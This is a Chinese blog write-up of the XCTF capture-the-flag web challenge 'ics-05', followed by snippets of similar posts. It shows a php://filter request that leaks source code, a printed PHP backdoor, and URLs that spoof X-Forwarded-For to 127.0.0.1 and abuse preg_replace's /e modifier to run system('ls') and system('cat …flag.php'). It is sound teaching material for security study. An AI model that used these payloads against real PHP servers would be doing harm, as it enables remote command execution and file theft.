xctf(web)-ics-05

最新推荐文章于 2025-04-12 16:23:50 发布
最新推荐文章于 2025-04-12 16:23:50 发布
阅读量972 收藏 3
点赞数 2
分类专栏: ctf题目wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/i_am_not_hacker/article/details/98869276
版权

本题的题目描述如下图所示,查看“设备维护中心”
在这里插入图片描述在这里插入图片描述再查看源码,也没有找到线索,通过php伪协议查看源码
php伪协议参考文章
在题目所给的url后加

?page=php://filter/convert.base64-encode/resource=index.php

即可查到base64加密后的源码
在这里插入图片描述base64解码后,查看代码,发现后门

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

进行代码审计发现需要将X_FORWARDED_FOR设置为127.0.0.1,并且用get传参方式将 ‘pattern’ ,’ replacement’,‘subject’ 三个参数传递给preg_replace函数。preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。preg_replace 函数的用法

使用burpsuite抓包,将X_FORWARDED_FOR设置为127.0.0.1,并且将url设置为 /index.php?pat=/(.*)/e&rep=system('ls')&sub=a 查看文件列表
在这里插入图片描述将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=a 查看s3chahahaDir文件夹,找到flag文件夹。
在这里插入图片描述将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=a 查看flag文件夹,找到flag.php文件。
在这里插入图片描述将url设置为 /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=a 查看flag
在这里插入图片描述

XCTF篇:Web (新手练习区)
小明师傅博客
06-09 594
1.view_source F12调出,后复制 2.robots 这里打开robots.txt 可以查看不让爬虫爬的目录 3.backup 备份文件,后缀加 .bak 下载下来 4.cookie f12,查看加载的cookie,发现在文件里 访问查看 5.disabled_button f12把disabled删了 6.weak_auth bp爆破 7.simple_php 解释 === 会同时比较字符串的值和类型 == 会先将字符串换成相同类型,再作比较,属于弱类.
xctf ics-02
weixin_51861515的博客
11-07 354
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
XCTF训练之ics-05
RoboTerh的博客
08-05 314
XCTF ics-05 打开题目,我们发现只有“设备维护中心”可以进入 又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index 查看源码,发现没有什么有用的东西 想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!! payload:?php://filter/convert.base64-encode/resource=index.php 得到源码: base64解码后得到关键php代码: <?php error_reporting(0); @s
php伪协议
最新发布
weixin_75168674的博客
04-12 939
类型示例功能说明本地文件常规文件读写网络访问获取远程网页数据输入流获取原始 POST 数据编码过滤获取源码并 base64 编码输出内联数据?执行/包含内嵌内容压缩包访问 zip 包中的 PHP 文件Phar 文件使用 Phar 进行反序列化利用。
xctf-ics05
Mars748的博客
11-12 457
xctf里面的一道webics05 这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。 这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。 将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显...
xctf ics-05 wp
doudoudedi
06-18 2779
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
XCTF web ics-05
H4ppyD0g的博客
09-06 352
preg_replace() 函数执行一个正则表达式的搜索和替换。 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 ...
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...
XCTFics-07
小白渣的博客
10-28 2375
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
XCTF Web 记录(ics-07)
ximo的博客
03-10 169
ics-07 打开页面: 直接就有view-source,打开,一共三部分: <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else
攻防世界WEB进阶之ics-05
harry_c的博客
08-24 2864
攻防世界WEB进阶之ics-051、描述2、实操3、答案 1、描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 题目场景: 点击获取在线场景 题目附件: 暂无 首先打开场景,进入系统设备维护中心,没有发现什么,查找到相关漏洞一个,查看源码: 2、实操 使用 http://111.198.29.45:449...
XCTF ics-05
小白渣的博客
10-01 632
题目来源 攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=php://...
xctf_web ics-05
fly夏天的博客
09-23 619
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
xctf-web-ics05
zhejichensha_l7l的博客
02-02 320
xctf-web-ics05 前言 这道题干什么,想要告诉我们什么。。。 瞎鸡儿分析 ics05这道题,可能是在入侵后利用管理的平台来完成一些信息的收集,所以读取他的文件并利用就非常重要 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 这里分析可能有错,单纯个人见解 过程 刚刚开始的url是:114.200.241.243:51522/index.php 看到页面有id 好家伙我又以为是sql注入了 特别是看到这个页面 正常回显。。 其实不是 认真再看看 没啥想法可以先看看这个文
XCTF-ics-05
臭nana的博客
12-09 370
打开题目,根据题目提示找到设备维护中心 点进去(其他点了都没用),没发现什么有用的东西 点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口 随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下 page=php://filter/read=convert.base64-encode/r...
XCTFics-05
Keepb1ue的博客
01-12 1482
php伪协议 + preg_replace+/e修正符命令执行
xctf(web)-ics-06
i_am_not_hacker的博客
08-09 1260
进入index.php,发现可以进行id传参 使用burpsuite抓包进行爆破,抓包后,右键send to inturder,修改为对id进行爆破,然后载入字典,也可以在本地新建一个txt文件,写入1到自己认为合适的某个数,然后开始爆破。 在爆破到id=2333时,发现响应包长度不同,查看response,找到flag ...
XCTF---web
空の城的博客
10-27 434
view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开页面后右键查看不了源代码,从题目中可以知道小宁想要看源代码,所以按F12查看发现flag robots 题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 根据题目提示,找到网站目录下的robots.txt 直接访问即可获得flag backup 题目描述:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来...
攻防世界(XCTFics-05 wp
qq_43399979的博客
09-05 475
到处点点看,发现会出现?page参数 因为index参数的存在,怀疑这里存在文件包含漏洞,经过几次尝试之后发现存在任意文件读取漏洞,用filter伪协议爆出了index.php。 page=php://filter/read=convert.base64-encode/resource=index.php 代码如下: <?php error_reporting(0); @sessi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值